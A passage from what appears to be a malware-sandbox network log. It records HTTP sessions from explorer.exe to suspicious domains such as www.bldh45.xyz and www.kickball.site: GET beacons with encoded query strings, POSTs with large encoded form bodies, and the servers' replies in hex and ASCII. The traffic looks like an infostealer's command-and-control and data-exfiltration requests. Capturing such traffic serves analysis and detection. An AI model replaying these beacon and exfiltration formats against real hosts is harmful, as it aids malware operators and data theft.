Hs-D7r2YbFOUY9xphLjMwjO6tfnJJtwPFwuL_fe(GnclnZ6CrUtDntMtT~8nJS2d677(5XSUAKojLkUwBgRTynjcx(xuSouNY4Q5IOn9vSLrTAqPRWbGxKrrvJtM3iCtcKyj3TRUP7K~3fabKSWjMeHA2eHCpfsvpyn8gcxbzIjQtfV30SpbErhcYNiPJobmJ3nkg8CtghAals3BEjIjA6i3-~3rKphygnTOztWymjUKt(c9wwGEyNOnTmgIT9zoYbfj60uMeJamKsY4Qakw1ZEfKEmD7lwtCYzq3Z4X-Gfs2okRgArlHez51xHV50AjQl777bamJ9K3EAJKGkeTb3C1VJR~z1ufcsAUvrK8PsSwEvIQpwxt8AbpPE0MtcgAF1H0ie_oZ8jOfCrqBjqaeaWoyKIjkd-uhFEK4LldFCIeumQWTjIRNj2kwJ3(dTqdK3yEEjXvPJhKznYmhpNjvSucfmr0yEYYZWXCPzJgvTCpe76pnOLnf0Q8QJcIlZuZ5SC7KOUuNCAH-HGKOV_Bg0eOQ9T8YHAmHMKKufYN_0C9D1tXbsMYxnXHi2m6KfjNYGW8gGR3S2H2Zy6XBKoRSu-XwGMKM8MWkbLmhL5ps(cc4eeDlJYF_q-cdlstIDpS_wJHoiOvjSlPd0Kl4kiOY0vamuMJ2J6qHYOh7ipRbeAjiHba2IFBBqvgmT8Fg5Pubb3kl3_d144~GZ5irKMe7x-S-yDKrJziOJ5cbF96GD4r9BJ9jlQDoil8wMjV5Rw5I49BhKGK9qqCvrPYgkykPi4Mou_4zG-fJtOcs(u~4Cl~av20cxGLCcGpDBJ84W4zMXy0EBkRsZJW_GBTZAjWnUh4MnbOVcStpab~MIGY6ADVoRL0fI1JWAfxcb4JYXXUjPlybf_v7fRuWxOahrH2oF4d5tLzwhJcaHj3PYk1Q8u9sdgsd7iNsnl7yUYRP3N2PDUr_vl0kFVH5HeN-(JB6KPbeeTSdLYqa3DKxNU626uVJO2f7YMmGfnkj(akpadBxASdaQatERHUnD7ZnK5vBN6ERmCE3SGUiSMBBbjB0A5wi~uPWoumr(6txI1GBvWLCQfM92V99gpREHbHblDdOyyL5y1MvC07qQF9wJuHZyBY88lnyFIyo7fYpAo0R4tdR0CbK0qu_Wr5f6tm5c5xRkfYHRH(c5immu7q32_SodNvAlykrOEPTpeXm76TK5ElT0PG2BSZksNqKYvIgDCGaiqKz0k(FlRsyJo0J6QtEW07IgqIb6F2-PMCO9WWSmhRng_OOwUY6fe1MeN4PWhE4uQz5Sjrs9hHS4WRIAv0C4nIJghl9d6uByBlPtFqb54BgOam_(5rdC4xFdGZx~sTcrFlYs88LhsCP5tsfup6BjHWdY_uO9Yoff2IDVLk9quCwaIe4Tg5lvddr83bQp_X4jnVuAN28b35vNd8i74m4U_5zdsgkQTSAOGYkYM3-ja(nzkYcEQt0Cmow7bMC0bV55nL5YS(fRI4YevTOfV(8jo(kx2eRP-SSOVQ2XUSVwo(JXGF4E_XRwRiUiDL9NKAJVoB58b9DqdJ7OyIV8VuErbtLqlXQtVupyaZbN89AEG(ZQu6GdellpsyuueGJScYjnhkHgldaL2RjaA(mM-H9Z5BeDLL2(s1T7XNqAjYEtCAcBwrYmJWs2D90ckpGH1u59ZkzxG43QVk-MtMVyspkOl5-fbV3SpLTcBfa66JZZvL8zKwv80~0Xq8XlvhXIxMlBrhhPor5vLHgEiy2ocLGT6cwQ0JJDIAFgy5f2lA9292uPytl(z2oGIx3aigU(s3I5BWwzXoqeOXEoyMKSZ7uj2Qob6D2VH2x75mwN1Eb7nxMAFYh2B0fzfO2KqNaHLqQXVLAHkxGebWKHAJZSBXImlDfL1FszsOrHXbW4XYm8duLA2h00biU5usIUdDJ~-M0cVGbEEAZzFUpHyp-JBsb4tqNMa~gO9NRJsUnTczp~cT38EOZuwXoq85Dv3VUgvVFNeu7gpSjke(lM82vwAHpUru_bXUY6xT1JEdzxTQ-0Jvv1Kz9efXbJSEbLtMDfO(vDriebwRELn2GdSZqBNoxY3P85I6m5kOqUjETW6mpRjwvrCI9AjXg0OKRYPtMF_NKGpIOEa82Cjuodpn5cWSejCRiFupc3ozyroiHNm3DbWEFcyphrLdxGToQmaQM0Nd7BBSL6uVoF2jkUvMTCBtLtqal~fdRuAqWJ9~VBZEI6Uqk9Y2qAy32hP0hurt9WnV6ZPww5Bt8BSCRyNc1FqxNGMlRUevVgFm_(t6dBIqrBpgkFKQpmjfP1IST0MZTtJ
                                                                                                      May 14, 2022 15:30:22.894263029 CEST9224INHTTP/1.1 405 Not Allowed
                                                                                                      Date: Sat, 14 May 2022 13:30:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 154
                                                                                                      Connection: close
                                                                                                      Server: namecheap-nginx
                                                                                                      Allow: GET, HEAD
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      6192.168.2.449780198.54.117.21680C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      May 14, 2022 15:30:22.895159960 CEST9233OUTGET /n6g4/?r2MLI=tjrDPFcXi&3fe=WPwjmGPV/4M22m+CqZhMswVRWzk0CJ3SgF5yTNe9lepyZyn4WVCBytWkJrBAR4vfZGHu HTTP/1.1
                                                                                                      Host: www.kickball.site
                                                                                                      Connection: close
                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                      Data Ascii:


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      7192.168.2.44978135.241.47.21680C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      May 14, 2022 15:30:28.487941027 CEST9234OUTPOST /n6g4/ HTTP/1.1
                                                                                                      Host: www.bldh45.xyz
                                                                                                      Connection: close
                                                                                                      Content-Length: 409
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.bldh45.xyz
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://www.bldh45.xyz/n6g4/
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Data Raw: 33 66 65 3d 52 70 4c 67 49 62 6c 5f 30 63 7e 41 70 57 36 7a 77 43 37 73 6e 64 69 62 74 4c 7e 42 6d 38 77 36 4d 76 48 76 67 79 33 58 4f 6c 39 54 50 49 38 45 63 34 50 74 4e 68 53 44 74 5f 7a 44 28 38 4e 79 30 31 42 56 65 30 39 63 44 35 50 51 73 38 53 55 6c 51 51 70 76 54 5a 46 59 55 45 4e 71 53 54 56 38 42 30 4d 57 47 35 47 65 53 6f 49 73 70 4a 58 72 50 33 41 79 48 72 68 77 71 6e 5f 50 6b 48 74 6a 64 79 79 43 69 42 5a 44 54 33 46 59 42 62 68 6d 6e 72 69 30 52 38 58 38 59 71 37 78 34 39 64 59 54 65 71 68 66 69 4a 70 6c 63 49 53 2d 70 4a 4e 32 75 65 74 47 65 4c 32 4d 62 76 62 53 72 5f 7a 6b 68 46 74 61 76 50 50 46 28 6f 77 52 77 6d 4c 47 74 4f 7e 7a 63 67 46 44 36 59 4e 4a 77 55 77 6a 62 6b 4d 4b 76 70 30 6b 41 54 6b 69 36 5f 6f 7a 66 67 6e 52 42 79 79 49 78 6f 6b 32 76 79 30 31 37 55 6d 6f 77 73 5a 71 37 51 42 54 4a 4f 35 70 42 4c 6f 49 6b 53 46 74 77 66 37 66 52 67 57 63 46 6e 65 58 56 45 72 66 61 4a 68 39 63 41 53 43 78 42 79 4e 62 45 43 32 58 44 69 77 66 67 49 59 7a 6e 33 44 43 36 6c 6a 41 46 79 4c 57 39 70 51 64 41 73 63 71 6b 7a 31 59 31 55 30 47 4d 4d 33 72 33 39 77 75 55 36 71 76 64 59 79 69 6d 71 5f 6e 68 69 33 49 6b 7e 48 7e 70 37 75 62 42 36 45 31 55 69 5a 6e 73 47 77 73 79 28 37 7a 35 69 41 29 2e 00 00 00 00 00 00 00 00
                                                                                                      Data Ascii: 3fe=RpLgIbl_0c~ApW6zwC7sndibtL~Bm8w6MvHvgy3XOl9TPI8Ec4PtNhSDt_zD(8Ny01BVe09cD5PQs8SUlQQpvTZFYUENqSTV8B0MWG5GeSoIspJXrP3AyHrhwqn_PkHtjdyyCiBZDT3FYBbhmnri0R8X8Yq7x49dYTeqhfiJplcIS-pJN2uetGeL2MbvbSr_zkhFtavPPF(owRwmLGtO~zcgFD6YNJwUwjbkMKvp0kATki6_ozfgnRByyIxok2vy017UmowsZq7QBTJO5pBLoIkSFtwf7fRgWcFneXVErfaJh9cASCxByNbEC2XDiwfgIYzn3DC6ljAFyLW9pQdAscqkz1Y1U0GMM3r39wuU6qvdYyimq_nhi3Ik~H~p7ubB6E1UiZnsGwsy(7z5iA).
                                                                                                      May 14, 2022 15:30:28.782715082 CEST9273INHTTP/1.1 405 Not Allowed
                                                                                                      Server: nginx/1.20.2
                                                                                                      Date: Sat, 14 May 2022 13:30:28 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 157
                                                                                                      Via: 1.1 google
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      8192.168.2.44978235.241.47.21680C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      May 14, 2022 15:30:28.506386995 CEST9248OUTPOST /n6g4/ HTTP/1.1
                                                                                                      Host: www.bldh45.xyz
                                                                                                      Connection: close
                                                                                                      Content-Length: 36477
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.bldh45.xyz
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://www.bldh45.xyz/n6g4/
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Data Raw: 33 66 65 3d 52 70 4c 67 49 61 4a 51 74 76 4b 72 32 33 47 59 6a 6e 66 6a 7a 39 79 64 75 37 4c 50 6f 59 6b 78 4f 74 28 37 39 6e 4b 76 50 67 49 47 4c 34 67 70 58 66 71 6f 4e 68 44 6e 68 70 44 66 37 63 42 78 30 31 5a 37 65 31 4a 63 43 36 50 41 73 64 44 78 6d 7a 34 6d 72 7a 5a 54 5a 55 46 4c 75 51 33 30 38 42 41 69 57 47 42 6f 64 68 38 49 73 4e 68 58 38 59 6a 4a 39 48 71 71 7e 4b 33 72 42 45 44 6a 6a 5a 6e 74 43 69 39 5a 43 6a 37 46 59 67 4c 6d 67 6b 54 74 7a 42 38 57 70 6f 71 79 7e 59 34 6b 59 54 61 49 68 61 43 4a 75 58 34 49 44 39 68 4a 4a 33 75 64 7e 32 65 4f 67 38 62 59 4e 69 6e 55 7a 6b 39 7a 74 62 62 31 4d 33 6a 6f 77 68 77 64 50 58 6c 38 30 41 31 69 48 41 6e 30 4e 4a 73 78 77 58 54 73 4d 4c 76 4a 39 79 4e 37 36 55 47 56 6f 78 7a 65 68 78 42 32 38 6f 77 30 6b 32 75 46 30 31 37 36 6d 70 67 73 5a 70 4c 51 43 77 78 4f 79 70 42 49 7e 6f 6b 55 4d 4e 77 45 28 66 55 48 57 63 63 49 65 57 4e 2d 7e 38 75 4a 69 4a 59 41 48 78 70 4f 35 4e 62 43 47 32 57 52 31 67 66 72 49 59 7a 5a 33 48 32 71 6c 51 30 46 77 65 36 39 75 7a 31 41 76 73 71 6b 32 31 59 37 64 55 4c 4a 4d 78 44 37 39 78 7e 62 36 62 72 64 59 45 57 6d 71 62 54 68 69 48 49 6b 79 6e 28 59 30 64 71 72 28 78 68 64 7a 49 33 5f 4a 51 39 59 35 37 32 30 67 54 4f 72 34 64 44 48 6e 69 53 73 75 44 55 73 49 37 43 50 35 52 46 67 62 68 4f 31 67 70 66 77 71 63 78 65 4b 52 4b 33 38 79 63 38 64 51 59 45 63 76 6f 48 6a 4f 63 52 59 30 35 44 33 4c 4d 37 38 32 4e 6e 66 6a 4a 39 28 4c 35 33 7a 6e 6f 78 78 4b 55 4a 4c 42 28 74 61 65 36 69 4a 41 61 76 65 57 6c 74 58 56 4c 78 63 49 51 46 39 34 38 74 7a 44 6a 44 71 64 63 5a 56 48 4d 44 68 45 6e 36 71 4e 7e 63 67 42 69 71 59 58 45 57 4b 48 74 55 7a 39 32 52 62 52 33 7a 37 6d 50 38 61 67 58 48 57 55 32 33 37 6e 63 6c 51 32 74 36 48 31 48 78 69 4a 48 2d 62 70 4e 70 4d 30 5a 41 36 6c 32 4a 68 55 63 4d 28 68 41 53 4c 31 6f 78 39 63 53 2d 68 61 79 43 57 43 64 64 38 5f 68 39 76 72 45 4d 38 34 68 41 28 50 43 34 50 54 6c 57 4a 32 4c 51 71 6d 6a 6e 58 42 28 47 56 47 34 4e 6f 64 72 68 75 70 34 49 7a 33 50 55 61 58 7e 57 48 59 4e 2d 76 4f 57 4d 47 56 72 6b 79 6c 61 65 77 74 4c 44 66 68 4b 69 65 4a 78 37 78 76 77 73 31 6f 46 31 6f 75 41 49 41 66 28 30 68 59 49 54 7e 68 47 76 6c 34 70 36 4c 43 63 73 55 78 5a 43 53 65 43 53 75 59 69 4a 62 5f 61 45 4c 46 61 72 6c 74 50 44 6a 58 6b 33 4d 64 71 4c 72 30 38 70 32 75 33 59 35 4b 39 37 41 48 57 6a 57 35 36 6a 66 53 6c 30 68 32 34 35 49 4c 47 5a 37 33 53 53 78 4f 65 6a 35 67 45 38 75 59 28 76 41 7a 77 77 28 62 6a 32 53 2d 34 51 76 66 58 44 76 54 28 59 64 69 47 4c 56 72 69 47 6e 39 4e 54 41 77 32 30 30 71 62 41 47 30 49 6e 7a 78 38 38 68 53 67 30 6f 71 32 4b 42 31 63 4b 6b 6d 59 56 58 34 65 73 6c 41 57 48 68 4a 38 6e 77 30 36 30 5a 53 4a 43 55 34 45 56 74 57 69 30 76 55 78 56 61 59 51 6c 74 56 33 4e 35 74 52 6a 4c 58 75 6f 62 63 54 62 78 64 4f 6b 56 69 58 51 6e 44 57 31 57 55 75 4b 62 31 54 79 45 6a 6f 48 4d 51 35 53 6f 7a 4a 62 35 30 48 63 51 44 71 69 5a 6b 36 57 31 52 77 58 6b 31 4a 44 77 6a 76 59 64 77 61 46 4e 49 48 75 63 6f 38 55 68 65 45 38 77 36 70 4d 46 53 30 74 43 6f 37 51 36 51 56 63 7a 43 34 47 65 49 56 7a 39 5a 41 7a 55 39 4d 4c 7a 7a 72 53 31 31 77 59 53 38 56 52 52 6d 6c 4c 78 7a 6e 7a 50 6d 62 33 72 37 5a 6c 4c 49 71 7a 56 31 46 61 28 62 45 44 6b 4a 4f 43 59 68 72 76 62 47 42 4d 50 53 4f 55 44 4f 56 62 62 2d 51 63 63 49 33 46 33 41 77 55 4f 42 72 31 52 2d 30 47 5a 52 64 49 4b 53 67 33 4a 67 65 79 28 34 7e 66 66 6a 45 34 44 30 71 43 68 78 43 79 28 44 76 31 6d 37 65 57 58 59 75 63 59 6a 50 77 74 54 43 33 42 69 62 4c 5a 35 43 42 31 48 39 48 52 61 65 77 43 63 72 77 35 59 35 6c 45 47 6b 76 6d 69 64 6c 4b 53 52 37 28 75 38 6d 37 49 46 57 4d 73 6e 67 55 5a 72 50 6c 66 77 50 50 79 67 33 6a 6a 56 46 68 45 6b 46 51 7a 4b 61 55 36 65 53 61 66 58 51 6b 69 67 41 6f 42 37 65 33 6e 52 78 54 32 76 78 68 4a 57 6f 59 63 71 4a 64 53 59 59 65 64 65 5a 68 41 69 54 35 73 63 66 78 62 61 78 4c 35 63 4e 5a 77 35 2d 50 70 4f 46 41 6b 63 36 36 73 28 42 57 4f 65 56 52 41 78 63 79 64 45 52 39 43 56 32 69 6a 77 6e 68 65 76 54 65 54 32 30 77 4a 48 75 41 5f 6a 63 46 51 39 48 77 47 46 55 30 58 35 4a 6a 57 47 34 4a 6f 71 64 62 44 6e
                                                                                                      Data Ascii: 3fe=RpLgIaJQtvKr23GYjnfjz9ydu7LPoYkxOt(79nKvPgIGL4gpXfqoNhDnhpDf7cBx01Z7e1JcC6PAsdDxmz4mrzZTZUFLuQ308BAiWGBodh8IsNhX8YjJ9Hqq~K3rBEDjjZntCi9ZCj7FYgLmgkTtzB8Wpoqy~Y4kYTaIhaCJuX4ID9hJJ3ud~2eOg8bYNinUzk9ztbb1M3jowhwdPXl80A1iHAn0NJsxwXTsMLvJ9yN76UGVoxzehxB28ow0k2uF0176mpgsZpLQCwxOypBI~okUMNwE(fUHWccIeWN-~8uJiJYAHxpO5NbCG2WR1gfrIYzZ3H2qlQ0Fwe69uz1Avsqk21Y7dULJMxD79x~b6brdYEWmqbThiHIkyn(Y0dqr(xhdzI3_JQ9Y5720gTOr4dDHniSsuDUsI7CP5RFgbhO1gpfwqcxeKRK38yc8dQYEcvoHjOcRY05D3LM782NnfjJ9(L53znoxxKUJLB(tae6iJAaveWltXVLxcIQF948tzDjDqdcZVHMDhEn6qN~cgBiqYXEWKHtUz92RbR3z7mP8agXHWU237nclQ2t6H1HxiJH-bpNpM0ZA6l2JhUcM(hASL1ox9cS-hayCWCdd8_h9vrEM84hA(PC4PTlWJ2LQqmjnXB(GVG4Nodrhup4Iz3PUaX~WHYN-vOWMGVrkylaewtLDfhKieJx7xvws1oF1ouAIAf(0hYIT~hGvl4p6LCcsUxZCSeCSuYiJb_aELFarltPDjXk3MdqLr08p2u3Y5K97AHWjW56jfSl0h245ILGZ73SSxOej5gE8uY(vAzww(bj2S-4QvfXDvT(YdiGLVriGn9NTAw200qbAG0Inzx88hSg0oq2KB1cKkmYVX4eslAWHhJ8nw060ZSJCU4EVtWi0vUxVaYQltV3N5tRjLXuobcTbxdOkViXQnDW1WUuKb1TyEjoHMQ5SozJb50HcQDqiZk6W1RwXk1JDwjvYdwaFNIHuco8UheE8w6pMFS0tCo7Q6QVczC4GeIVz9ZAzU9MLzzrS11wYS8VRRmlLxznzPmb3r7ZlLIqzV1Fa(bEDkJOCYhrvbGBMPSOUDOVbb-QccI3F3AwUOBr1R-0GZRdIKSg3Jgey(4~ffjE4D0qChxCy(Dv1m7eWXYucYjPwtTC3BibLZ5CB1H9HRaewCcrw5Y5lEGkvmidlKSR7(u8m7IFWMsngUZrPlfwPPyg3jjVFhEkFQzKaU6eSafXQkigAoB7e3nRxT2vxhJWoYcqJdSYYedeZhAiT5scfxbaxL5cNZw5-PpOFAkc66s(BWOeVRAxcydER9CV2ijwnhevTeT20wJHuA_jcFQ9HwGFU0X5JjWG4JoqdbDnujO01H62Ac6nijl0pPl8v~QJI5ZBGbi7LqUgR5YMvLYkyLcjVbfX7TtySKl4o6flRzJJIrMeLfRXUlO00wzp_JB6tbHsMEvL8AxeRjq21qLjxw0r9r9HoQ48_9egrockAaAq6(WMUgzORoM8Kzp7o9N6PHrR_bSjvKDADFzSFMh9gLvQS1teO3VAIufc6X7F1tGbzzyWpKFmLcZuHAvRfThps05m2ymKfxwdIhVt7E_3IcE6wtgLo39WmkBgTNIDVNs2bQ_01JHN8qwkz~epqV5VvwANxJhpH4evHUKjgvevra3saERuzHQ6_vf3M6zYUO2(rZsmRyPT2fb4QDmG7nuI5d6e0UzhlVmNNu9HMlIdbSUEWkXEmxD1RFmCJHW3DTI42AoKpg74VBs8NvqhKtHwWcQ9oP5Yus7MjPIZlcV9Pzuqo93~mx3DlxkDxniZonNpPdmD5XdTaKzk5FajK2ET8tYUr0PTHWtclGn~07Zvg~ykEj1T5SCLfcf914nYasOaFz6hrWZnEG7B561LucTdXPi7AALa8PElTixYB9qHGY41CpoVaFKDPurViNAiugGB1pSTj5zwgYBVAhn6PMfUfNb~Wf8Ty(-rmfVAoLi5IN6NKxoi5q5ONKjrPZf9OjQvA3cp-TrLDyPCGP6L56suwziLiR2i916oiY03ispI9OOUwi1hNVlfKMldn7WXoHsWdNRdZB4vToVDSfzTeYTVghAEO(UFhoq331xdXPO23UHr4B-htFMWWrjvvOgowCFjxfquGYfJUn8KqnyMRKrJqlU4ITOeiK39IK3XhcURmokZ3e6MwjyJQ7CXIZamgsX7BKF11579-mPdXN4KFxFNEOFbecY0XINUPBOnVKoQ9qUXld2tXTBx0cD1qprzJPOWfbTuLCVJVNAx780u2~AzuqHGXsfoB6pAgU8qgNrr2czoXRB27ccSRsZ41mOvViSqIYeGwh8othwu0ElIrKkDdgN5yXJXOIbxTM2vLs38Ka-OE~edWfVb1VHLYBsOeJIGM0GNmXMtL4YP2~f3GiwAaufOkO_AtRjps18YVTOAIIr5Z(rpfD71AfjR9K6NPhM4pOd5y(PotqjFWuCnyduEh4rYOlTYv8qTkI9aGTR5bx5rU4IVE6PGYsd8BWpZPYZyS2KTsKYmt7LVTvpMX6MmZ6Y8l~E1I7sKqCFd8C4np7dOUAi(2vXkZnibbmZpzNQHTCrZtUxblounfXSiO31OKDRwlMpxELpdWIFaUMk8KRA~MZROte10DF00lsVrmurmC113YAiiHjTgdWb3MAAyYaBJqLRKplpiOufAbspHmQGCMdM36mmW3oKRTlbbudco0NuRdO_re5x0MFAREaer0iseq82q3xgwe6f8S76QjAYnPf3vuo2wEMZ8H1CwkrLN8muvH8S1BLuEeQRNiHgNcmE0KzRTXI8Inrc23dMHnN_TZeKQ4Byftck3Nq-u_FkzBNVNBvfLwg-uA(3geIVKH9Q7Zy5MMgGqrRXrYDxbFMIV0rQm9fYj8Oqr8cFQKG9NCmZTp(xSGfz9gTgkZrHjEmt3Qs8YMqsTtvKDo7aspFSPpDC5M4W7xmCXZ68ZN9WYmqF(M62Luk5Dl93DMEpnEzoWv3B2OHD9p5_KmirZtlSTHikjQIBrFpeDLlukcMlASky2o0Wan0qKfRjzGXxkfi_JUpmmUDvXXqKxjnM~YYTRcLR~QBI(FhXPW7Kq1ka3ICjGGcPrXZ6cNfwhsT99e1Nq5dDO5x7dtoE96jc~l1_SBrBNiWyKWtBy43V~ZYrVtF8cEkI(vHvufr_JOUqTH2Rocitw6gPhgjhjaG8Iqq1paZ-5zror4vaL8T2qseXcR(18T9m7XQU3XO7QRTMcuxrofliyyyhHfqIpPFdHMlxTm2gzxJ8bjkdGeC-Bm0hY3UMGIh0O_l6Py1PCJvIXGzIwCceTPzKix2ledOs9W8WsHoCC_zduYXSPE2YAsoWZqlcwrkBzh67dbPIbt9OtHFpeKycSb515LiBZe5Ag7aOnySNE0eB5pcb3PMxR1B5W1UvKLgDJo0PWc9r1Z4Yw4YOqqejrXJrPhsRSLUuE59sSO~lfaMFRxIYd6VswpoqitqU79idduerjZOJbojpxO2my1RTfDBSOICQSz1nZNXHILF5LS1AW2C3tjzRF3g6Z_Tjfq~wA4sen0vQ~TL91M21CVxdozihhhstpOijSK0letez(DJPmQc8rH11vY43Leyvyui8U6kn4TiI(aBN49lZ(bbIRY65akswsKV13L3SaybyuUCYRHv9DvRBaVgd1pTKK6gojQRxvv2Ew8M4o7dxOXsFJL(ZOKQkNvexPICCxWhsZV7R~0~BcKH4M6DybxyL6ZHP5clkILXL6cnon5cY3RUSbcwblaAEucmNb-GXqWyo4lXRId4HvMripqXh8e5s1DHAzl6kIsiN(RmPi2zdF_LnjcO2LsnVTmRn1uUqEWX9JfmyNscu6-F7hBoxxc7OEtxSNwGzUz81vIXbIxkWI9UaT6ODQfRFfuDhbDBrwfUyqXWAdN9-UK1vYpWclL6D8MHgk15Wq2A5rgMK1Q~xF9cGTrhtR4UPIC5lbuwmlCuArXNueVb8h9rHMXnqfV(5cZwrJIW7L5jOgQedFmJ8Bi0XI9FjRX2QKk40kfKcWolptq8h5lNpBACJksOCeFTcXkOfhvQbhnk4AeXRGePUibN1Fe58
                                                                                                      May 14, 2022 15:30:28.803536892 CEST9274INHTTP/1.1 405 Not Allowed
                                                                                                      Server: nginx/1.20.2
                                                                                                      Date: Sat, 14 May 2022 13:30:28 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 157
                                                                                                      Via: 1.1 google
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      9192.168.2.44978335.241.47.21680C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      May 14, 2022 15:30:28.532234907 CEST9272OUTGET /n6g4/?3fe=er/aW89j3eiO30Tth32zztWhmYSSn5MxbIqpkVj2P1EZBbsuTNG7fFHg+MTirOdy738q&r2MLI=tjrDPFcXi HTTP/1.1
                                                                                                      Host: www.bldh45.xyz
                                                                                                      Connection: close
                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                      Data Ascii:
                                                                                                      May 14, 2022 15:30:28.838778973 CEST9276INHTTP/1.1 200 OK
                                                                                                      Server: nginx/1.20.2
                                                                                                      Date: Sat, 14 May 2022 13:30:28 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 5248
                                                                                                      Last-Modified: Fri, 11 Mar 2022 02:41:55 GMT
                                                                                                      Vary: Accept-Encoding
                                                                                                      ETag: "622ab6f3-1480"
                                                                                                      Cache-Control: no-cache
                                                                                                      Accept-Ranges: bytes
                                                                                                      Via: 1.1 google
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 77 70 6b 52 65 70 6f 72 74 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 67 6c 6f 62 61 6c 65 72 72 6f 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 